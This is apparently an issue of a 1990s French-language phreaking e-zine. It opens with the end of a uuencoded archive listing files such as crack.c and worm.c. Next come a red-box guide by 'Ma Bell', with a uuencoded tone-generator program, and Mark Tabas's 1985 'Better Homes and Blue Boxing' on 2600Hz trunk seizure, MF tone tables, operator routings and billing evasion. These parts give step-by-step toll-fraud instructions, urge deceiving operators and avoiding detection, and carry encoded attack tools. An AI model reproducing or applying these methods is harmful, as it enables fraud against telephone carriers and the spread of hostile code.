MJP-*VD@U\F2#BU)2Q5(\6>E)->-MK77<OY+HR8ET3ELUV>C9IJ36\I9?=#0/
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
M\>5'=UQ"5UO(:@L[2L,699GB)&DI>\\ESA'6'AT`>^(J:3:5AHF=`(O!%%7X
M),/]&J0T0&U[IEYVNXG[#U!+`0(3`Q0````(`-8-Q1;?SQI5+!,``/4R```*
M``````````$```"`@0````!C<F%C:W-O;2YC4$L!`A,#%`````@`[PW%%L-F
MTJ*R)@``^'T```0``````````0```("!5!,``&AS+F-02P$"$P,4````"`#W
M#<46VAH+)#H!``#N`0``"``````````!````@($H.@``;6%K969I;&502P$"
M$P,4````"`#[#<46ZN'6,G\$``"F"0``!0`````````!````@(&(.P``;F5T
M+F-02P$"$P,4````"``"#L46HXIY0Y0!``"'`@``!P`````````!````@($J
M0```<W1U8G,N8U!+`0(3`Q0````(``8.Q19L1X$!$P8``+<-```&````````
M``$```"`@>-!``!W;W)M+F-02P$"$P,4````"``)#L4670-!YL("``!L!0``
M!@`````````!````@($:2```=V]R;2YH4$L!`A,#%`````@`EX)!&.5GO-5!
M%0``R6\```D``````````0```("!`$L``'=O<FUD97,N8U!+`0(3`Q0````(
M``L.Q1:5(0;2T0(```X&```*``````````$```"`@6A@``!X.#$Q,S4U,"YC
64$L%!@`````)``D`WP$``&%C````````
`
end
sum -r/size 36678/35771 section (from "begin" to "end")
sum -r/size 50658/25942 entire input file


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------


UNE BOX POUR CARTES SONORES

intro par Atreid Bevatron


Ma Bell est un phreaker made in USA. Il vient d'‚crire un
petit programme pour ceux qui possŠdent des cartes sonores. €a
fonctionne trŠs bien avec la SoundBlaster, peut-ˆtre aussi avec
la carte Adlib. Le programme se trouve … la fin du texte,
uuencod‚. Vous avez tous UUENCODE, non? Il ‚tait inclus dans le
dernier NPC. Go get it!



OMNIBOX

par Ma Bell


Make your recording:

Use a fairly high-quality tape; if there is too much
distortion and/or tape hiss you may have to do some fast talking
to a disgruntled operator. Use a direct connection from your
sound card to the recorder, of course! For some reason, when I
make my recordings, there is a lot of hiss until after the first
tone. So just make sure you don't try to use that first tone when
doing the real thing. An even better idea is to wait until the
leader is past in the tape, record a few tones, and then hit the
counter reset and record the rest of your tones. That way you'll
know exactly how far to rewind it in case you have to do so
quickly.

Don't just make a recording of hundreds of quarter tones;
make sure you have some dimes and nickels sprinkled in there,
too. This will make the whole thing more believeable in case you
have to deal with an operator. The length of your tape is
completely up to you, but the longer it is the less you'll have
to rewind!

To the fone!

Pick out a fone that is somewhat isolated. ***Make sure that
it's an AT&T or other telco phone.*** If the phone is a COCOT
(privately owned), you don't need to bother with the red box,
just use a white box if you can with that particular phone. If
you need more info on this e-mail me. Dial the LD number just as
you normally would. A recording should tell you exactly how much
you need to "deposit." At this point, on some phones you'll need
to deposit a real coin before starting the recording. I
personally have never come across a phone such as this. Start the
recording! Make sure your volume is just high enough to be
registered, but not too high! If it is too loud the operator can
tell the difference. An operator may come on and personally tell
you how much you need to deposit--don't be scared, just make sure
the volume is low enough and play the tape! If you do it right
all should go well. Give him/her some BS about how you have to
find some change in your pocket. A recording will beep in
occasionally to demand more money: just play the tones like
before.

Hanging Up:

9 times out of ten, the phone will start ringing after you
hang up. If you answer it, it will be a recording asking for some
more money. You can either "deposit" some more, or say something
vulgar into the phone and hang up. Sometimes the phone will just
ring once after you hang up; I have no idea why.

Things to Try:
To make yourself even less noticeable, you could get a pair
of those headphones that you stick in your ear. Put the recorder
in your coat pocket and run one of the earphones down your sleeve
into your palm. Then all you have to do is cup your hand with the
earphone over the microphone--pretty slick. I've heard that there
is a way to make local calls using 10ATT, but being on a college
campus where local calls are free anyway, I have not messed with
this.

Have phun, and don't get caught!!
Ma Bell [*][0][#]
------

All right, folks, here's what you've all been waiting for!!
[Dramatic music]

OMNIBOX.

Have phun, and don't get caught! E-mail any questions to me.

begin 660 omnibox.exe
M35K4 X ' P%__^N 0 $ 7D!4 !4$M,251%($-O<'(N(#$Y
M.3 @4$M705)%($EN8RX@06QL(%)I9VAT<R!297-E<G9E9 @ 14 Q@ T "<$
M)Z2% @! !,%@ ' 58GE,<":? +- : 6 ##D (!0FIP"

...

ME='3T>U*=)31TX#[ G,6+HJ_N0*LBM@>5@8?B_<K\_.D7A_KA-'M2G4$K96R
M$-'3@/L(<MK1[4IU!*V5LA#1TX#[%W+*T>U*=02ME;(0T=.!X]\ AM_KO*P"
MR(#5 #S_= +K@RZ+'M "B^N#PQ SP*R1XPZM \..P*V7)@$=XOGK[*T#P_J.
MT*V+X/NM ]A3K5".Q8[=,\"+V(O(B]"+Z(OPB_C+ P ""@0% !@<(
<"0$" #! 4& '" D*"PP- !Y ?C+

end
--
"Ma Bell"




-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------


*Blue Box Back Then*

-First Part-

intro par Kermit


Blue Box. Ahhh, Blue Box. Les textes … son sujet abondent, mais aprŠs
consultation, j'avais remarqu‚ qu'ils ont … peu prŠs tous ‚t‚ modifi‚s,
et chang‚s et ... Une recontre sur IRC avec Mark Tabas, et voici les
originaux, tels quels, ‚crits par Tabas en 1985. Bon, j'ai commenc‚ un
peu tard, j'ai donc pas le temps d'en faire plus pour cette fois. Par
contre, je continue mes recherches, avec l'aide de Gurney Halleck.
La 2ieme partie sera (devrait ˆtre) une liste de fr‚quences et timing
pour plusieurs pays, et des plans de Blue Box.

--------

From pioneer.ci.net!SAS.UPENN.EDU!clindsly Wed Mar 2 22:01:47 1994
Received: by sietch.ci.net (1.65/waf)
via UUCP; Wed, 02 Mar 94 23:52:32 EST
for kermit
Received: from SAS.UPENN.EDU by pioneer.ci.net (8.6.4) with UUCP
id WAA03790 for kermit@sietch.ci.net; Wed, 2 Mar 1994 22:01:40 -0500
Received: from NOC4.DCCS.UPENN.EDU by usenet.elf.com with SMTP id AA14234
(5.67a/IDA-1.5 for <kermit@sietch.ci.net>); Wed, 2 Mar 1994 21:56:21 -0500
Received: from MAIL.SAS.UPENN.EDU by noc4.dccs.upenn.edu
id AA25048; Wed, 2 Mar 94 21:56:16 -0500
Received: by mail.sas.upenn.edu
id AA14404; Wed, 2 Mar 94 18:42:37 EST
Posted-Date: Wed, 2 Mar 94 18:42:37 EST
Message-Id: <9403022342.AA14404@mail.sas.upenn.edu>
Subject: Boxing File
To: kermit@sietch.ci.net
Date: Wed, 2 Mar 94 18:42:37 EST
X-Mailer: ELM [version 2.3 PL11-upenn1.11]

-------------------------------------------------------------------
Note to sysops:
You are welcome to download this file and use it on your system,
providing you DO NOT remove the credits for Mark Tabas or KAOS. In
other words, try to act like a human being!
-------------------------------------------------------------------

The Mark Tabas encounter
series presents:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part I
Theory of Operation
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

To quote Karl Marx, blue boxing has always been the most noble
form of phreaking. As opposed to such things as using an MCI
code to make a free fone call, which is merely mindless pseudo-
phreaking, blue boxing is actual interaction with the Bell System
toll network. It is likewise advisable to be more cautious when
blue boxing, but the careful phreak will not be caught, regardless
of what type of switching system he is under.

In this part, I will explain how and why blue boxing works, as
well as where. In later parts, I will give more practical
information for blue boxing and routing information.

To begin with, blue boxing is simply communicating with trunks.
Trunks must not be confused with subscriber lines (or "customer
loops") which are standard telefone lines. Trunks are those lines
that connect central offices. Now, when trunks are not in use
(i.e., idle or "on-hook" state) they have 2600Hz applied to them.
If they are two-way trunks, there is 2600Hz in both directions.
When a trunk IS in use (busy or "off-hook" state), the 2600Hz is
removed from the side that is off-hook. The 2600Hz is therefore
known as a supervisory signal, because it indicates the status of
a trunk; on hook (tone) or off-hook (no tone). Note also that
2600Hz denoted SF (single frequency) signaling and is "in-band."
This is very important. "In-band" means that it is within the band
of frequencies that may be transmitted over normal telefone lines.
Other SF signals, such as 3700Hz are used also. However, they
cannot be carried over the telefone network normally (they are
"out-of-band") and are therefore not able to be taken advantage of
as 2600Hz is.

Back to trunks. Let's take a hypothetical phone call. You pick up
your fone and dial 1+806-258-1234 (your good friend in Amarillo,
Texas). For ease, we'll assume that you are on #5 Crossbar
switching and not in the 806 area. Your central office (CO) would
recognize that 806 is a foreign NPA, so it would route the call to
the toll centre that serves you. [For the sake of accuracy here,
and for the more experienced readers, note that the CO in question
is a class 5 with LAMA that uses out-of-band SF supervisory
signaling]. Depending on where you are in the country, the call
would leave your toll centre (on more trunks) to another toll
centre, or office of higher "rank". Then it would be routed to
central office 806-258 eventually and the call would be completed.
Illustration:

A----CO1----TC1-----------------------------------TC2----CO2----B

A = You. TC2 = Toll office in Amarillo.
CO1 = Your central office. CO2 = 806-258 central office.
TC1 = Your toll office. B = Your friend (806-258-1234).


In this situation it would be realistic to say that CO2 uses SF
in-band (2600Hz) signaling, while all the others use out-of-band
signaling (3700Hz). If you don't understand this, don't worry too
much. I am pointing this out merely for the sake of accuracy. The
point is that while you are connected to 806-258-1234, all those
trunks from YOUR central office (CO1) to the 806-258 central office
(CO2) do *NOT* have 2600Hz on them, indicating to the Bell
equipment that a call is in progress and the trunks are in use.

Now let's say you're tired of talking to your friend in Amarillo
(806-258-1234) so you send a 2600Hz down the line. This tone
travels down the line to your friend's central office (CO2) where
it is detected. However, that CO thinks that the 2600Hz is
originating from Bell equipment, indicating to it that you've hung
up, and thus the trunks are once again idle (with 2600Hz present on
them). But actually, you have not hung up, you have fooled the
equipment at your friend's CO into thinking you have. Thus, it
disconnects him and resets the equipment to prepare for the next
call. All this happens very quickly (300-800ms for step-by-step
equipment and 150-400ms for other equipment).

When you stop sending 2600Hz (after about a second), the
equipment thinks that another call is coming towards it (e.g. it
thinks the far end has come "off-hook" since the tone has stopped).
It could be thought of as a toggle switch: tone --> on hook, no
tone --> off hook. Now that you've stopped sending 2600Hz, several
things happen:

1) A trunk is seized.
2) A "wink" is sent to the CALLING end from the CALLED end
indicating that the CALLED end (trunk) is not ready to receive
digits yet.
3) A register is found and attached to the CALLED end of the trunk
within about two seconds (max).
4) A start-dial signal is sent to the CALLING end from the CALLED
end indicating that the CALLED end is ready to receive digits.

Now, all of this is pretty much transparent to the blue boxer. All
he really hears when these four things happen is a <beep><ker-
chunk>. So, seizure of a trunk would go something like this:

1) Send a 2600Hz
2) Terminate 2600Hz after 1-2 secs.
3) <beep><kerchunk>

Once this happens, you are connected to a tandem that is ready to
obey your every command. The next step is to send signaling
information in order to place your call. For this you must
simulate the signaling used by operators and automatic toll-
dialing equipment for use on trunks. There are mainly two systems,
DP and MF. However, DP went out with the dinosaur, so I'll only
discuss MF signaling. MF (multi - frequency) signaling is the
signaling used by the majority of the inter- and intra-lata
network. It is also used in international dialing known as the
CCITT no. 5 system.

MF signaling consists of 7 frequencies, beginning with 700Hz and
separated by 200Hz. A different set of two of the 7 frequencies
represent the digits 0 through 9, plus an additional 5 special
keys. The frequencies and uses are as follows:

--------------------------------------
Frequencies (Hz) Domestic Int'l
--------------------------------------
700+900 1 1
700+1100 2 2
900+1100 3 3
700+1300 4 4
900+1300 5 5
1100+1300 6 6
700+1500 7 7
900+1500 8 8
1100+1500 9 9
1300+1500 0 0
700+1700 ST3p Code 11
900+1700 STp Code 12
1100+1700 KP KP1
1300+1700 ST2p KP2
1500+1700 ST ST
--------------------------------------

The timing of all the MF signals is a nominal 60ms, except for
KP, which should have a duration of 100ms. There should also be a
60ms silent period between digits. This is very flexible, however,
and most Bell equipment will accept outrageous timings.

In addition to the standard uses listed above, MF pulsing also
has expanded usages known as "expanded in-band signaling" that
include such things as coin collect, coin return, ring back,
operator attached, and operator released. KP2, code 11, and code
12 and the ST_ps (STart "primes") all have special uses which will
be mentioned only briefly here.

To complete a call using a blue box, once seizure of a trunk has
been accomplished by sending 2600Hz and pausing for the <beep>
<kerchunk>, one must first send a KP. This readies the register for
the digits that follow. For a standard domestic call, the KP would
be followed by either 7 digits (if the call were in the same NPA as
the seized trunk) or 10 digits (if the call were not in the same
NPA as the seized trunk). [Exactly like dialing a normal fone
call] Following either the KP and 7 or 10 digits, a STart is sent
to signify that no more digits follow. Example of a complete call:

1) Dial 1-806-258-1234.
2) wait for a call-progress indication.
(such as ring, busy, recording, etc.)
3) Send 2600Hz for about 1 second.
4) Wait for about 2 seconds while a trunk is seized.
5) Send KP+305+994+9966+ST.

The call will then connect if everything was done properly. Note
that if a call to an 806 number were being placed in the same
situation, the area code would be omitted and only KP+seven digits
+ST would be sent.

Code 11 and code 12 are used in international calling to request
certain types of operators. KP2 is used in international calling to
route a call other than by way of the normal route, whether for
economic or equipment reasons.

STp, ST2p, and ST3p (prime, two prime, and three prime) are used
in TSPS signaling to indicate calling type of call (such as coin-
direct dialed).

This has been Part I of Better Homes and Blue Boxing. I hope you
enjoyed and learned from it. If you have any questions, comments,
threats or insults, please feel free to drop me a line. If you have
noticed any errors in this text (yes, it does happen), please let
me know and perhaps a correction will be in order. Part II will
deal mainly with more advanced principles of blue boxing, as well
as routings and operators.

Note 1: other highly trunkable areas include: 816, 305, 813, 609,
and 205. I personally have excellent luck boxing off of 609-953-
0000. Try that if you have any trouble.
...................................................................
(c) January 7, 1985 Mark Tabas
...................................................................
LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD




The Mark Tabas encounter
series presents:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part II
Practical Applications
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(It is assumed that the reader has read and understood Part I of
this series).

The essential purpose of blue boxing in the beginning was merely
to receive toll services free of charge. Though this can still be
done, blue boxing has essentially outlived its usefulness in this
area. Modern day "extenders" and long distance services provide a
safer and easier way to make free fone calls. However, you can do
things with a blue box that just can't be done with anything else.
For ordinary toll-fraud, a blue box is impractical for the
following reasons:

1) Clumsy equipment required (blue box or equivalent)
2) Most boxed calls must be made through an extender. Not for
safety reasons, but for reasons I'll explain later.
3) Connections are often sacrificed because considerable distances
must be dialed to cross a seizable trunk, in addition to
awkward routing.

As stated in reason #2, boxed calls are usually made through an
extender. This is for billing reasons. If you recall from Part I,
2600Hz is used as a "supervisory" signal. That is, it signals the
status of a trunk -- "on-hook" or "off-hook." When you seize a
trunk (by briefly sending 2600Hz), your end (the CALLING end) goes
on hook for the duration of the 2600Hz and then goes off-hook once
again when the 2600Hz is terminated. The CALLED end recognizes that
a call is on the way and attaches a register, which interprets the
digits which are to be sent. Now, understand that even though your
end has come off-hook (no 2600Hz present), the other end is still
on-hook. You may wonder then, why, if the other end (the CALLED
end) is still on-hook, there is no 2600Hz coming the other way on
the trunk, when there should be. This is correct. 2600Hz *IS*
present on the trunk when you seize it and afterwards, but you
cannot hear it because of a Band Elimination Filter (BEF) at your
central office.

Back to the problem. Remember that when you seize a trunk, 2600Hz
is indeed coming the other way on the trunk because the CALLED end
is still on-hook, but you don't actually hear it because of a
filter. However, the Bell equipment knows it's there (they can
"hear" it). The presence of the 2600Hz is telling the billing
equipment that your call has not yet been completed (i.e., the
CALLED end is still on-hook). When finally you do connect with your
boxed call, the 2600Hz from the called end terminates. This tells
the billing equipment that someone picked up the fone at the CALLED
end and you should begin to be billed. So you do start to get
billed, but for the call to the trunk, NOT the boxed call. Your
billing equipment thinks that you've connected with the number you
used to seize the trunk.

Illustration:

1) You call 1+806-258-2222 (directly)
2) Status of trunks:

<--------------------------------------------------------------->
(You) 806-258-2222
No 2600Hz----------------------> <-------------------------2600Hz

When you seize a trunk (before the number you called answers)
there is no affect on your billing equipment. It simply thinks that
you're still waiting for the call to complete (the CALLED end is
still on-hook; it is ringing, busy, going to recording or intercept
operator).

Now, let's say that you've seized a trunk (806-258-2222) and for
example, KP+314+949+1705+ST. The call is routed from the tandem you
seized to: 314-949-1705.

Illustration:

<------------------------------->O<----------------------------->
(You) 806 tandem 314-949
No 2600Hz-----------------------> <------------------------2600Hz

Note that the entire path towards the right (the CALLED end) has
no 2600Hz present and is therefore "off-hook." The entire path
towards the left (the CALLING end) does have 2600Hz present on it,
indicating that the CALLED end has not picked up (or come
"off-hook"). When 314-949-1705 answers, "answer supervision" is
given and the 2600Hz towards the left (the CALLING end) terminates.
This tells your billing equipment, which thinks that you're still
waiting to be connected with 806-258-2222, that you've finally
connected. Billing then begins to 806-258-2222. Not exactly an
auspicious beginning for an aspiring young phone phreak.

To avoid this, several actions may be taken. As previously
mentioned, one may avoid being charged for the number called to
seize a trunk by using an extender (in which case the extender will
get billed). In some areas, boxing may be accomplished using an 800
number, generally in the format of 800-858-xxxx (many Amarillo
numbers) or 800-NN2-xxxx (special intra-state class in-WATS
numbers). However, boxing off of 800 numbers is impossible in many
areas. In my area, Denver, I am served by #1A ESS and it is
impossible for me to box off of any 800 number.

Years ago, in the early days of blue boxing (before my time),
phreaks often used directory assistance to box off of because they
were "free" long distance calls. However, because of competitive
long distance companies, directory assistance surcharges are now
$0.50 in many areas. It is additionally advised that

  
directory
assistance numbers not be used to box from because of the
following:

Average DA calls last under two minutes. When you box a call,
chances are that it will last considerably longer. Thus, the Bell
billing equipment will make a note of calls to directory assistance
that last a long time. A call to a directory assistant lasting for
4 hours and 17 minutes may appear somewhat suspicious. Although the
date, time, and length of a DA call does not appear on the bill, it
is recorded on AMA tape and will trip a trouble report if it were
to last too long. This is how most phreaks were discovered in the
old days. Also, sometimes too many calls lasting too long to one
800 number may raise a few eyebrows at the local security office.

Assuming you can complete a blue box call, the following are
listed routings for various Bell internal operators. These are in
the format of KP+NPA+special routing+1X1+ST, which I will explain
later. The 1X1 is the actual operator routing, and NPA and NPA+
special routing are used for out-of-area code calls and out-of-area
code calls requiring special routing, respectively.

KP+101+ST - Toll test board
KP+121+ST - Inward op
KP+131+ST - Directory assistance
KP+141+ST - Was rate & route. Now only works in 312, 815, 717, and
a few others. It has been replaced with a universal
rate & route number, 800+141+1212.
KP+151+ST - Overseas completion operator (inbound). Works only in
certain NPAs, such as 303.
KP+181+ST - In some areas, toll station for small towns.

Thus, if you seize a trunk in 806 NPA and wanted an inward (in
806), then you would dial KP+121+ST. If you wanted a 312 inward and
were dialing on an 806 trunk, an area code would be required. Thus,
you would dial KP+312+121+ST. Finally, some places in the network
require special routing, in addition to an area code. An example is
Franklin Park, Ill. It requires a special routing of 032. For this,
you would dial KP+312+032+121+ST for a Franklin Park inward
operator.

Special routings are in the format of 0XX. They are used
primarily for load balance, so that traffic flow may be evenly
distributed. About half of the exchanges in the network require
special routing. Note that special routings are NEVER EVER EVER
used to dial normal telephone numbers, only operators.

Operator functions:

TOLL TEST BOARD- Generally a cordboard position that assists in
trunk testing. They are not used by operators, only switchmen.

INWARD- Assists the normal TSPS (0+) operator in completing calls
out of the TSPS's area. Also, inwards perform emergency interrupts
when the number to be interrupted is out of the area code of the
original (TSPS) operator. For example, a 303 operator has a
customer that needs an emergency interrupt on 215-647-6969. The
303 operator gets the routing for the inward that covers 215-647,
since she cannot do the interrupt herself. The routing is found to
be only 215+ (no special routing required). So, the 303 operator
keys KP+215+121+ST. An inward answers and the 303 says to her,
"Inward, this is Denver. I need an emergency interrupt on 215-647-
6969. My customer's name is Mark Tabas." The inward will then do
the interrupt (off the line, of course). If the number to be
interrupted had required special routing, such as, say, 312-456-
1234 (spec routing 032), then the 303 operator would dial KP+312+
032+121+ST for the inward to do that interrupt.

DIRECTORY ASSISTANCE- These are the normal NPA+555+1212 operators
that assist customers with obtaining telefone directory listings.
Not much toll-fraud potential here, except maybe $0.50.

RATE AND ROUTE- These operators are reached by dialing KP+800+141+
1212+ST. They assist normal (TSPS) operators with rates and
routings (thus the name). The only uses I typically have for them
are the following:

